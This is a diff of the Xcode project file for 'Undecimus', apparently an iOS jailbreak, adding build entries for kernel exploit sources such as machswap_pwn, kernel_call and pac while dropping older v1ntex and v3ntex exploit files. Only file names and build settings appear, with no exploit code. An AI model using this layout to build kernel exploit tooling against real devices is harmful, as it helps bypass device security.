+		216F3F352228776D007DC1BC /* user_client.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = user_client.h; sourceTree = "<group>"; };
+		216F3F362228776D007DC1BC /* kernel_call.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kernel_call.c; sourceTree = "<group>"; };
+		216F3F372228776D007DC1BC /* user_client.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = user_client.c; sourceTree = "<group>"; };
+		216F3F382228776D007DC1BC /* pac.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = pac.h; sourceTree = "<group>"; };
+		216F3F392228776D007DC1BC /* kernel_call.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kernel_call.h; sourceTree = "<group>"; };
+		216F3F3A2228776D007DC1BC /* pac.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = pac.c; sourceTree = "<group>"; };
+		216F3F3B2228776D007DC1BC /* kc_parameters.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kc_parameters.h; sourceTree = "<group>"; };
+		216F3F3C2228776E007DC1BC /* kc_parameters.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = kc_parameters.c; sourceTree = "<group>"; };
 		216FDA1D220C5F5C0086D802 /* libz.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = libz.tbd; path = usr/lib/libz.tbd; sourceTree = SDKROOT; };
-		216FDA20220C62C80086D802 /* v1ntex_offsets.mm */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.objcpp; path = v1ntex_offsets.mm; sourceTree = "<group>"; };
-		216FDA21220C62C80086D802 /* v1ntex_offsets.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = v1ntex_offsets.h; sourceTree = "<group>"; };
-		216FDA23220C68A60086D802 /* v1ntex_exploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = v1ntex_exploit.h; sourceTree = "<group>"; };
-		216FDA24220C68A60086D802 /* v1ntex_exploit.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = v1ntex_exploit.m; sourceTree = "<group>"; };
 		2171C4002222E3BB004E45C7 /* SystemConfiguration.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = SystemConfiguration.framework; path = System/Library/Frameworks/SystemConfiguration.framework; sourceTree = SDKROOT; };
+		2199B8E7226B40C600A8255D /* kalloc_crash.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kalloc_crash.h; sourceTree = "<group>"; };
+		2199B8E8226B40C600A8255D /* kalloc_crash.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kalloc_crash.c; sourceTree = "<group>"; };
+		219BF90422832DBC00A4B827 /* UIProgressHUD.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = UIProgressHUD.h; sourceTree = "<group>"; };
+		219C909E228703DA00AFA38A /* jailbreak.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = jailbreak.h; sourceTree = "<group>"; };
+		219C909F228703DA00AFA38A /* jailbreak.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = "<group>"; };
 		21A97FC42148103A00DC0023 /* KernelExecution.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = KernelExecution.h; sourceTree = "<group>"; };
 		21A97FC52148103B00DC0023 /* remote_call.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = remote_call.h; sourceTree = "<group>"; };
 		21A97FC62148103B00DC0023 /* remote_memory.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = remote_memory.c; sourceTree = "<group>"; };
@@ -135,6 +132,9 @@
 		21A97FCC2148103B00DC0023 /* KernelUtilities.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = KernelUtilities.c; sourceTree = "<group>"; };
 		21A97FCD2148103B00DC0023 /* remote_call.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = remote_call.c; sourceTree = "<group>"; };
 		21A97FCE2148103C00DC0023 /* remote_memory.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = remote_memory.h; sourceTree = "<group>"; };
+		21B4218F2261302F004C17CD /* MobileCoreServices.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = MobileCoreServices.framework; path = System/Library/Frameworks/MobileCoreServices.framework; sourceTree = SDKROOT; };
+		21BB9802222F05C40012AF40 /* machswap2_pwn.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = machswap2_pwn.m; sourceTree = "<group>"; };
+		21BB9803222F05C40012AF40 /* machswap2_pwn.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = machswap2_pwn.h; sourceTree = "<group>"; };
 		21C0FC6721369EB700849420 /* Undecimus.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = Undecimus.app; sourceTree = BUILT_PRODUCTS_DIR; };
 		21C0FC6A21369EB700849420 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = "<group>"; };
 		21C0FC6B21369EB700849420 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = "<group>"; };
@@ -146,10 +146,10 @@
 		21C0FC7921369EB800849420 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = "<group>"; };
 		21C0FC8021369EE900849420 /* KernelMemory.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = KernelMemory.c; sourceTree = "<group>"; };
 		21C0FC8121369EE900849420 /* empty_list_sploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = empty_list_sploit.h; sourceTree = "<group>"; };
-		21C0FC8221369EE900849420 /* KernelStructureOffsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = KernelStructureOffsets.h; sourceTree = "<group>"; };
+		21C0FC8221369EE900849420 /* KernelOffsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = KernelOffsets.h; sourceTree = "<group>"; };
 		21C0FC8321369EE900849420 /* KernelMemory.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = KernelMemory.h; sourceTree = "<group>"; };
 		21C0FC8521369EE900849420 /* empty_list_sploit.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = empty_list_sploit.c; sourceTree = "<group>"; };
-		21C0FC8621369EE900849420 /* KernelStructureOffsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = KernelStructureOffsets.m; sourceTree = "<group>"; };
+		21C0FC8621369EE900849420 /* KernelOffsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = KernelOffsets.m; sourceTree = "<group>"; };
 		21C0FC8B21369FC500849420 /* common.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = common.h; sourceTree = "<group>"; };
 		21C0FC8F2136A2C500849420 /* iokit.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = iokit.h; sourceTree = "<group>"; };
 		21C0FC902136A46500849420 /* SpringBoardServices.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; path = SpringBoardServices.framework; sourceTree = "<group>"; };
@@ -162,15 +162,22 @@
 		21C13117214D268F0021AA9D /* multi_path_sploit.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = multi_path_sploit.c; sourceTree = "<group>"; };
 		21C13118214D268F0021AA9D /* multi_path_sploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = multi_path_sploit.h; sourceTree = "<group>"; };
 		21C1312E214D5A710021AA9D /* multi_path.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = multi_path.entitlements; sourceTree = "<group>"; };
-		21E4052B2215E543006065CE /* v3ntex_exploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = v3ntex_exploit.h; sourceTree = "<group>"; };
-		21E4052C2215E543006065CE /* v3ntex_exploit.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = v3ntex_exploit.m; sourceTree = "<group>"; };
+		21CC3901227CDFDE0072D572 /* prefs.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = prefs.h; sourceTree = "<group>"; };
+		21CC3902227CDFDE0072D572 /* prefs.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = prefs.m; sourceTree = "<group>"; };
+		21CC3903227CDFDE0072D572 /* diagnostics.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = diagnostics.m; sourceTree = "<group>"; };
+		21CC3904227CDFDE0072D572 /* diagnostics.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = diagnostics.h; sourceTree = "<group>"; };
 		21E9642421A1DD6F000625F7 /* NSTask.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = NSTask.h; sourceTree = "<group>"; };
 		21F4D70C21FC7A590070D5E0 /* patchfinder64.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; name = patchfinder64.c; path = patchfinder64/patchfinder64.c; sourceTree = SOURCE_ROOT; };
 		21F4D70D21FC7A590070D5E0 /* patchfinder64.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = patchfinder64.h; path = patchfinder64/patchfinder64.h; sourceTree = SOURCE_ROOT; };
 		21FED6A42168DB460024BC95 /* Painting_With_Chocolate.ttf */ = {isa = PBXFileReference; lastKnownFileType = file; path = Painting_With_Chocolate.ttf; sourceTree = "<group>"; };
+		21FF63C9224E5FDC008B76D9 /* offsetcache.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; name = offsetcache.c; path = "offset-cache/offsetcache.c"; sourceTree = SOURCE_ROOT; };
+		21FF63CA224E5FDC008B76D9 /* offsetcache.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; name = offsetcache.h; path = "offset-cache/offsetcache.h"; sourceTree = SOURCE_ROOT; };
+		21FFE0F4222E4C0600EC59B2 /* machswap_pwn.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = machswap_pwn.h; sourceTree = "<group>"; };
+		21FFE0F5222E4C0600EC59B2 /* machswap_offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = machswap_offsets.h; sourceTree = "<group>"; };
+		21FFE0F6222E4C0600EC59B2 /* machswap_offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = machswap_offsets.m; sourceTree = "<group>"; };
+		21FFE0F7222E4C0600EC59B2 /* machswap_pwn.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = machswap_pwn.m; sourceTree = "<group>"; };
 		222AD59221FA731800DCBA2A /* FakeApt.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = FakeApt.m; sourceTree = "<group>"; };
 		222AD59421FA732A00DCBA2A /* FakeApt.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = FakeApt.h; sourceTree = "<group>"; };
-		2253F710221020EA0031D809 /* libmagic.a */ = {isa = PBXFileReference; lastKnownFileType = archive.ar; name = libmagic.a; path = Undecimus/libs/libmagic.a; sourceTree = "<group>"; };
 		225D142121E052960045493D /* ArchiveFile.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ArchiveFile.m; sourceTree = "<group>"; };
 		225D142321E055E90045493D /* ArchiveFile.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ArchiveFile.h; sourceTree = "<group>"; };
 		226689DA21EC145000262F66 /* archive.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = archive.h; sourceTree = "<group>"; };
@@ -191,21 +198,13 @@
 			isa = PBXFrameworksBuildPhase;
 			buildActionMask = 2147483647;
 			files = (
+				21B421902261302F004C17CD /* MobileCoreServices.framework in Frameworks */,
 				2171C4012222E3BB004E45C7 /* SystemConfiguration.framework in Frameworks */,
-				2253F711221020EB0031D809 /* libmagic.a in Frameworks */,
 				216FDA1E220C5F5C0086D802 /* libz.tbd in Frameworks */,
-				216FDA0D220C5C320086D802 /* libplist.a in Frameworks */,
-				216FDA10220C5C3E0086D802 /* libimg4tool.a in Frameworks */,
 				226689DD21EC1C5A00262F66 /* libarchive.2.tbd in Frameworks */,
 				22CFED9221CDFE6B00A216BE /* libmis.tbd in Frameworks */,
-				216FDA12220C5C530086D802 /* liboffsetfinder64.a in Frameworks */,
-				214D283C22146EC70058933D /* libmagic.a in Frameworks */,
 				2170BDCD21B332FC0059BD10 /* SpringBoardServices.framework in Frameworks */,
-				216FDA0E220C5C320086D802 /* libplist++.a in Frameworks */,
 				2170BD3B21B193800059BD10 /* libMobileGestalt.tbd in Frameworks */,
-				216FDA08220C5BDC0086D802 /* libgrabkernel.a in Frameworks */,
-				216FDA04220C5BA90086D802 /* libfragmentzip.a in Frameworks */,
-				216FDA1A220C5EAD0086D802 /* libcurl.a in Frameworks */,
 			);
 			runOnlyForDeploymentPostprocessing = 0;
 		};
@@ -238,6 +237,17 @@
 			name = necp;
 			sourceTree = "<group>";
 		};
+		214A1771224EBE4900588EC4 /* kerneldec */ = {
+			isa = PBXGroup;
+			children = (
+				214A1774224EBE5400588EC4 /* kerneldec.cpp */,
+				214A1772224EBE5400588EC4 /* kerneldec.h */,
+				214A1773224EBE5400588EC4 /* lzssdec.cpp */,
+				214A1775224EBE5400588EC4 /* lzssdec.h */,
+			);
+			name = kerneldec;
+			sourceTree = "<group>";
+		};
 		2150A9C6220212A6001C8677 /* empty_list */ = {
 			isa = PBXGroup;
 			children = (
@@ -303,20 +313,11 @@
 			name = voucher_swap;
 			sourceTree = "<group>";
 		};
-		2166453A22257E7000B37252 /* lzssdec */ = {
-			isa = PBXGroup;
-			children = (
-				2166453B22257E7900B37252 /* lzssdec.cpp */,
-				2166453C22257E7900B37252 /* lzssdec.h */,
-			);
-			name = lzssdec;
-			sourceTree = "<group>";
-		};
 		21675B62214A68B700D20E2B /* Frameworks */ = {
 			isa = PBXGroup;
 			children = (
+				21B4218F2261302F004C17CD /* MobileCoreServices.framework */,
 				2171C4002222E3BB004E45C7 /* SystemConfiguration.framework */,
-				2253F710221020EA0031D809 /* libmagic.a */,
 				216FDA1D220C5F5C0086D802 /* libz.tbd */,
 				226689DC21EC1C5A00262F66 /* libarchive.2.tbd */,
 				22CFED9121CDFE6B00A216BE /* libmis.tbd */,
@@ -325,67 +326,25 @@
 			name = Frameworks;
 			sourceTree = "<group>";
 		};
-		216FDA02220C5B620086D802 /* libs */ = {
+		216F3F342228774D007DC1BC /* kernel_call */ = {
 			isa = PBXGroup;
 			children = (
-				214D283B22146EC70058933D /* libmagic.a */,
-				216FDA03220C5BA90086D802 /* libfragmentzip.a */,
-				216FDA07220C5BDC0086D802 /* libgrabkernel.a */,
-				216FDA0B220C5C320086D802 /* libplist.a */,
-				216FDA0C220C5C320086D802 /* libplist++.a */,
-				216FDA0F220C5C3E0086D802 /* libimg4tool.a */,
-				216FDA11220C5C530086D802 /* liboffsetfinder64.a */,
-				216FDA19220C5EAD0086D802 /* libcurl.a */,
+				216F3F3C2228776E007DC1BC /* kc_parameters.c */,
+				216F3F3B2228776D007DC1BC /* kc_parameters.h */,
+				216F3F362228776D007DC1BC /* kernel_call.c */,
+				216F3F392228776D007DC1BC /* kernel_call.h */,
+				216F3F3A2228776D007DC1BC /* pac.c */,
+				216F3F382228776D007DC1BC /* pac.h */,
+				216F3F372228776D007DC1BC /* user_client.c */,
+				216F3F352228776D007DC1BC /* user_client.h */,
 			);
-			path = libs;
-			sourceTree = "<group>";
-		};
-		216FDA05220C5BB80086D802 /* libfragmentzip */ = {
-			isa = PBXGroup;
-			children = (
-				216FDA06220C5BB80086D802 /* libfragmentzip.h */,
-			);
-			path = libfragmentzip;
-			sourceTree = "<group>";
-		};
-		216FDA09220C5BE50086D802 /* libgrabkernel */ = {
-			isa = PBXGroup;
-			children = (
-				216FDA0A220C5BE50086D802 /* libgrabkernel.h */,
-			);
-			path = libgrabkernel;
-			sourceTree = "<group>";
-		};
-		216FDA13220C5C620086D802 /* liboffsetfinder64 */ = {
-			isa = PBXGroup;
-			children = (
-				216FDA14220C5C620086D802 /* insn.hpp */,
-				216FDA15220C5C620086D802 /* liboffsetfinder64.hpp */,
-				216FDA16220C5C620086D802 /* patch.hpp */,
-				216FDA17220C5C620086D802 /* liboffsetfinder64_common.h */,
-				216FDA18220C5C620086D802 /* exception.hpp */,
-			);
-			path = liboffsetfinder64;
-			sourceTree = "<group>";
-		};
-		216FDA1F220C62B20086D802 /* v1ntex */ = {
-			isa = PBXGroup;
-			children = (
-				216FDA20220C62C80086D802 /* v1ntex_offsets.mm */,
-				216FDA21220C62C80086D802 /* v1ntex_offsets.h */,
-				216FDA23220C68A60086D802 /* v1ntex_exploit.h */,
-				216FDA24220C68A60086D802 /* v1ntex_exploit.m */,
-			);
-			name = v1ntex;
+			name = kernel_call;
 			sourceTree = "<group>";
 		};
 		2170BD3421B192750059BD10 /* include */ = {
 			isa = PBXGroup;
 			children = (
-				214D283D22146EE60058933D /* magic.h */,
-				216FDA13220C5C620086D802 /* liboffsetfinder64 */,
-				216FDA09220C5BE50086D802 /* libgrabkernel */,
-				216FDA05220C5BB80086D802 /* libfragmentzip */,
+				219BF90422832DBC00A4B827 /* UIProgressHUD.h */,
 				2150A9E322021381001C8677 /* mach_vm.h */,
 				2150A9E422021381001C8677 /* ipc_port.h */,
 				2150A9E52202138A001C8677 /* IOKitLib.h */,
@@ -405,7 +364,6 @@
 		2170BD3621B192B90059BD10 /* resources */ = {
 			isa = PBXGroup;
 			children = (
-				21C1312E214D5A710021AA9D /* multi_path.entitlements */,
 				21FED6A42168DB460024BC95 /* Painting_With_Chocolate.ttf */,
 			);
 			path = resources;
@@ -414,9 +372,11 @@
 		2170BDCB21B32FF10059BD10 /* source */ = {
 			isa = PBXGroup;
 			children = (
-				2166453A22257E7000B37252 /* lzssdec */,
-				21E4052A2215E535006065CE /* v3ntex */,
-				216FDA1F220C62B20086D802 /* v1ntex */,
+				2199B8E6226B40BD00A8255D /* kalloc_crash */,
+				214A1771224EBE4900588EC4 /* kerneldec */,
+				21FF63C8224E5FCE008B76D9 /* offset-cache */,
+				21FFE0F3222E4B1600EC59B2 /* machswap */,
+				216F3F342228774D007DC1BC /* kernel_call */,
 				213E78222208652B00FDF3B7 /* necp */,
 				2150A9CA220212F8001C8677 /* voucher_swap */,
 				2150A9C9220212E6001C8677 /* deja_xnu */,
@@ -434,8 +394,8 @@
 				21A97FC82148103B00DC0023 /* KernelExecution.m */,
 				21C0FC8021369EE900849420 /* KernelMemory.c */,
 				21C0FC8321369EE900849420 /* KernelMemory.h */,
-				21C0FC8221369EE900849420 /* KernelStructureOffsets.h */,
-				21C0FC8621369EE900849420 /* KernelStructureOffsets.m */,
+				21C0FC8221369EE900849420 /* KernelOffsets.h */,
+				21C0FC8621369EE900849420 /* KernelOffsets.m */,
 				21A97FC92148103B00DC0023 /* KernelUtilities.h */,
 				21A97FCC2148103B00DC0023 /* KernelUtilities.c */,
 				21C0FC7921369EB800849420 /* main.m */,
@@ -455,6 +415,12 @@
 				22C546AA21A8A8FD00EFC09C /* utils.m */,
 				222AD59421FA732A00DCBA2A /* FakeApt.h */,
 				222AD59221FA731800DCBA2A /* FakeApt.m */,
+				21CC3901227CDFDE0072D572 /* prefs.h */,
+				21CC3902227CDFDE0072D572 /* prefs.m */,
+				21CC3904227CDFDE0072D572 /* diagnostics.h */,
+				21CC3903227CDFDE0072D572 /* diagnostics.m */,
+				219C909E228703DA00AFA38A /* jailbreak.h */,
+				219C909F228703DA00AFA38A /* jailbreak.m */,
 			);
 			path = source;
 			sourceTree = "<group>";
@@ -467,6 +433,15 @@
 			path = frameworks;
 			sourceTree = "<group>";
 		};
+		2199B8E6226B40BD00A8255D /* kalloc_crash */ = {
+			isa = PBXGroup;
+			children = (
+				2199B8E7226B40C600A8255D /* kalloc_crash.h */,
+				2199B8E8226B40C600A8255D /* kalloc_crash.c */,
+			);
+			name = kalloc_crash;
+			sourceTree = "<group>";
+		};
 		21C0FC5E21369EB700849420 = {
 			isa = PBXGroup;
 			children = (
@@ -488,7 +463,6 @@
 		21C0FC6921369EB700849420 /* Undecimus */ = {
 			isa = PBXGroup;
 			children = (
-				216FDA02220C5B620086D802 /* libs */,
 				2170BDCC21B330210059BD10 /* frameworks */,
 				2170BDCB21B32FF10059BD10 /* source */,
 				2170BD3621B192B90059BD10 /* resources */,
@@ -497,19 +471,11 @@
 				21C0FC7321369EB800849420 /* Assets.xcassets */,
 				21C0FC7521369EB800849420 /* LaunchScreen.storyboard */,
 				21C0FC7821369EB800849420 /* Info.plist */,
+				21C1312E214D5A710021AA9D /* multi_path.entitlements */,
 			);
 			path = Undecimus;
 			sourceTree = "<group>";
 		};
-		21E4052A2215E535006065CE /* v3ntex */ = {
-			isa = PBXGroup;
-			children = (
-				21E4052B2215E543006065CE /* v3ntex_exploit.h */,
-				21E4052C2215E543006065CE /* v3ntex_exploit.m */,
-			);
-			name = v3ntex;
-			sourceTree = "<group>";
-		};
 		21F4D70B21FC7A490070D5E0 /* patchfinder64 */ = {
 			isa = PBXGroup;
 			children = (
@@ -519,6 +485,28 @@
 			name = patchfinder64;
 			sourceTree = "<group>";
 		};
+		21FF63C8224E5FCE008B76D9 /* offset-cache */ = {
+			isa = PBXGroup;
+			children = (
+				21FF63C9224E5FDC008B76D9 /* offsetcache.c */,
+				21FF63CA224E5FDC008B76D9 /* offsetcache.h */,
+			);
+			name = "offset-cache";
+			sourceTree = "<group>";
+		};
+		21FFE0F3222E4B1600EC59B2 /* machswap */ = {
+			isa = PBXGroup;
+			children = (
+				21FFE0F5222E4C0600EC59B2 /* machswap_offsets.h */,
+				21FFE0F6222E4C0600EC59B2 /* machswap_offsets.m */,
+				21FFE0F4222E4C0600EC59B2 /* machswap_pwn.h */,
+				21FFE0F7222E4C0600EC59B2 /* machswap_pwn.m */,
+				21BB9803222F05C40012AF40 /* machswap2_pwn.h */,
+				21BB9802222F05C40012AF40 /* machswap2_pwn.m */,
+			);
+			name = machswap;
+			sourceTree = "<group>";
+		};
 		22F91CD821E02CC700B2FCAE /* injector */ = {
 			isa = PBXGroup;
 			children = (
@@ -564,7 +552,7 @@
 		21C0FC5F21369EB700849420 /* Project object */ = {
 			isa = PBXProject;
 			attributes = {
-				LastUpgradeCheck = 0940;
+				LastUpgradeCheck = 1010;
 				ORGANIZATIONNAME = Pwn20wnd;
 				TargetAttributes = {
 					21C0FC6621369EB700849420 = {
@@ -626,38 +614,48 @@
 			isa = PBXSourcesBuildPhase;
 			buildActionMask = 2147483647;
 			files = (
-				2166453D22257E7900B37252 /* lzssdec.cpp in Sources */,
-				21E4052D2215E543006065CE /* v3ntex_exploit.m in Sources */,
 				21FED6AB2168F8060024BC95 /* SettingsTableViewController.m in Sources */,
+				216F3F3E2228776E007DC1BC /* user_client.c in Sources */,
 				2150A9E022021348001C8677 /* parameters.c in Sources */,
 				21A97FD12148103C00DC0023 /* KernelExecution.m in Sources */,
 				2150A9E122021348001C8677 /* kernel_alloc.c in Sources */,
 				2150A9DD22021348001C8677 /* platform_match.c in Sources */,
 				212D8844216E4C4800A36DA5 /* find_port.c in Sources */,
 				213E78262208654700FDF3B7 /* necp.c in Sources */,
-				216FDA22220C62C80086D802 /* v1ntex_offsets.mm in Sources */,
 				22C546AB21A8A8FD00EFC09C /* utils.m in Sources */,
 				2150A9DC22021348001C8677 /* log.c in Sources */,
+				216F3F3D2228776E007DC1BC /* kernel_call.c in Sources */,
 				22F91CE321E033A500B2FCAE /* libsnappy.c in Sources */,
 				21A97FD42148103C00DC0023 /* remote_call.c in Sources */,
 				21C130E0214BC2880021AA9D /* unlocknvram.c in Sources */,
 				21C13119214D268F0021AA9D /* multi_path_sploit.c in Sources */,
+				214A1777224EBE5400588EC4 /* kerneldec.cpp in Sources */,
 				2116449A21737F9500250744 /* JailbreakViewController.m in Sources */,
 				21F4D70E21FC7A590070D5E0 /* patchfinder64.c in Sources */,
 				2150A9DE22021348001C8677 /* platform.c in Sources */,
 				213E7828220865A100FDF3B7 /* voucher_swap-poc.c in Sources */,
 				22F91CDB21E02CF300B2FCAE /* inject.m in Sources */,
+				2199B8E9226B40C600A8255D /* kalloc_crash.c in Sources */,
 				21C1312F214E69F80021AA9D /* empty_list_sploit.c in Sources */,
 				21C0FC8721369EE900849420 /* KernelMemory.c in Sources */,
+				21CC3906227CDFDE0072D572 /* diagnostics.m in Sources */,
 				21C0FC7A21369EB800849420 /* main.m in Sources */,
 				212D8847216E4DF600A36DA5 /* early_kalloc.c in Sources */,
+				21CC3905227CDFDE0072D572 /* prefs.m in Sources */,
 				21A97FD02148103C00DC0023 /* remote_memory.c in Sources */,
 				222AD59321FA731800DCBA2A /* FakeApt.m in Sources */,
-				216FDA25220C68A60086D802 /* v1ntex_exploit.m in Sources */,
+				21FF63CB224E5FDC008B76D9 /* offsetcache.c in Sources */,
+				216F3F3F2228776E007DC1BC /* pac.c in Sources */,
 				21A97FD32148103C00DC0023 /* KernelUtilities.c in Sources */,
-				21C0FC8A21369EE900849420 /* KernelStructureOffsets.m in Sources */,
+				219C90A0228703DA00AFA38A /* jailbreak.m in Sources */,
+				21C0FC8A21369EE900849420 /* KernelOffsets.m in Sources */,
+				21FFE0F9222E4C0600EC59B2 /* machswap_pwn.m in Sources */,
+				21FFE0F8222E4C0600EC59B2 /* machswap_offsets.m in Sources */,
 				212D884A216E4EBF00A36DA5 /* async_wake.c in Sources */,
+				21BB9804222F05C40012AF40 /* machswap2_pwn.m in Sources */,
+				214A1776224EBE5400588EC4 /* lzssdec.cpp in Sources */,
 				2150A9E222021348001C8677 /* kernel_memory.c in Sources */,
+				216F3F402228776E007DC1BC /* kc_parameters.c in Sources */,
 				2150A9DF22021348001C8677 /* kernel_slide.c in Sources */,
 				2101395521A09BB700F9C5F2 /* hideventsystem.c in Sources */,
 				21C130EB214C03690021AA9D /* CreditsTableViewController.m in Sources */,
@@ -795,9 +793,13 @@
 			isa = XCBuildConfiguration;
 			buildSettings = {
 				ALWAYS_SEARCH_USER_PATHS = YES;
+				ARCHS = (
+					arm64e,
+					arm64,
+				);
 				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
 				CLANG_ENABLE_OBJC_ARC = YES;
-				CODE_SIGN_ENTITLEMENTS = "$(SRCROOT)/Undecimus/resources/multi_path.entitlements";
+				CODE_SIGN_ENTITLEMENTS = "$(SRCROOT)/Undecimus/multi_path.entitlements";
 				CODE_SIGN_IDENTITY = "iPhone Developer";
 				CODE_SIGN_STYLE = Manual;
 				DEVELOPMENT_TEAM = "";
@@ -813,6 +815,8 @@
 					"$(PROJECT_DIR)/patchfinder64",
 					"$(PROJECT_DIR)/snappy",
 					"$(PROJECT_DIR)/Injector",
+					"$(PROJECT_DIR)/offset-cache",
+					"$(PROJECT_DIR)/kerneldec",
 				);
 				INFOPLIST_FILE = Undecimus/Info.plist;
 				IPHONEOS_DEPLOYMENT_TARGET = 11.0;
@@ -822,6 +826,7 @@
 					"$(PROJECT_DIR)/Undecimus",
 					"$(PROJECT_DIR)/Undecimus/libs",
 				);
+				ONLY_ACTIVE_ARCH = NO;
 				OTHER_CFLAGS = "";
 				"OTHER_CFLAGS[arch=*]" = "-DUNDECIMUS";
 				OTHER_LDFLAGS = (
@@ -833,6 +838,7 @@
 				PRODUCT_NAME = "$(TARGET_NAME)";
 				PROVISIONING_PROFILE_SPECIFIER = "";
 				TARGETED_DEVICE_FAMILY = "1,2";
+				VALID_ARCHS = "arm64 arm64e";
 			};
 			name = Debug;
 		};
@@ -840,9 +846,13 @@
 			isa = XCBuildConfiguration;
 			buildSettings = {
 				ALWAYS_SEARCH_USER_PATHS = YES;
+				ARCHS = (
+					arm64e,
+					arm64,
+				);
 				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
 				CLANG_ENABLE_OBJC_ARC = YES;
-				CODE_SIGN_ENTITLEMENTS = "$(SRCROOT)/Undecimus/resources/multi_path.entitlements";
+				CODE_SIGN_ENTITLEMENTS = "$(SRCROOT)/Undecimus/multi_path.entitlements";
 				CODE_SIGN_IDENTITY = "iPhone Developer";
 				CODE_SIGN_STYLE = Manual;
 				DEVELOPMENT_TEAM = "";
@@ -858,6 +868,8 @@
